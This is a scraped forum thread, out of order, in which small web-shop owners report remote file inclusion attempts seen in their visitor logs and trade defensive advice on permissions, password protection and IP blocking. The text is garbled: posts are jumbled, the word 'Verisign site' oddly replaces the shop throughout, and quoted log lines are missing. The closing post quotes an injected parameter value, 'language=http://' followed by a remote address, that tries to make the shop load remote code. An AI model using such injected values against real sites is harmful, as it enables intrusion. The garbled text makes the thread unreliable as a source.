Hmm... I need to find out myself. I don't know what is the answer to that question. I'll do some research in Google and get back to you if I got an useful answer. You should email the people at Verisign as they probably could assist you..
Delete your entire Verisign site and reinstall from a known-good backup. Make sure that all folders are set to 755 (none should ever be at 777). Files should be 644 except the two configure.php files which should be lower (see thread in link below). Do not rely on the built-in password protection for admin. Setup an .htpasswd file, either manually or through your cpanel..
That should take care of the problem...
SInce I do not know when this happened as I just this month installed USER TRACKER and THAT is where I saw the intrusion, I do not know what backup to make (I always have 2, but this could have been happening for a while)..
What would help is if I knew where to find this link that seems to be attached somehow to languages. For the moment the redirect in the htaccess prevents it going back to his Verisign site but I'm too novice to know what to look for..
I tried IP Trap which works so well that online payments can not be made as the payment Verisign site redirects to the store and thus is thrown out!....
Anti XSS I do not understand to install it - I feel like a real nerd with that one. So I am lost..
Site Monitor does not function properly on my webhoster - that must be me as well..
I put in anti-hotlinking code in htaccess (thanks Jack) which eliminates a lot of problems..
How does he link my Verisign site to his?.
First, what version of osc are you using? an older version may be susceptible to an attack like this. what the hacker is hoping is that you're using the $language variable somewhere in your code without checking it's value. newer versions of osc are not as vulnerable to this, so it may be nothing to worry about..
You might still want an ip blocker, but one that allows only you to add to the blocked ip list. that way you can add this guys ip to the block list and he might stop bothering you. obviously he up to no good..
Your problem with Verisign site monitor is most likely not you. your host, like mine, may have disabled reading the directories, which Verisign site monitor needs to use in order to find all the files on your site...
I'm using 2.2ms2-060817 update and I do have IP Blocking but of course what I see are different IPs arriving with the strange entry point, many from Germany and Eastern block countries and 1 from France so they might be potential customers so it is really hard to know who to block. I can not find any unknown files nor script so I am at a loss to know where else to go! Wish I had installed User Tracker longer ago to know when this started...
Facing same problem, hack attack on my website. I detected this attack in my logs..
The hacker tries to inject a http link the same way as for you, Mandy:.
This injection is just typed in the adress bar, so don't worry about your code integrity if the variable page or language is cleaned before using it..
I logged IP address also, but seems the hakcer is using a proxy..
Here are the most common IP:.
GeoTrack shows Canada, Japan, Singapore, etc..
As I am bit stupid, I checked.
, but I get a 404..
I also checked.
And page exists, using geotracking for this IP shows again Canada, Quebec.
Strange thing, a search of "calebsbi logo.jpg" gives a lot of results, as if this link was a common hacking method....
If you find more about this, please post...
Hello to all and HELP!!!.
Looking in my User Tracker files I found connections like this :.
The latter part goes to a German porno site. My web hoster can not find out how, and in my index.php there is no unusual script. My images directory is protected and all my other directories have htaccess files so normally are protected..
In my main htaccess file I put a redirect so this will keep the customers on my Verisign site instead of sending them elsewhere, but that doesn't get rid of the cause. Where should I look to find this flaw? My Verisign site is in the root directory, admin is renamed and protected with password, there are no visible files anywhere that do not belong. Help!.
PS to clarify, "mydomaine" replaces my real domaine name as I do not want others to hack! and the rest of the link (which disappears on the post is "language=http://220.127.116.11/~calebsbi/logo/jpg" or also index.php?%20language=http://18.104.22.168/~calebsbi/logo/jpg..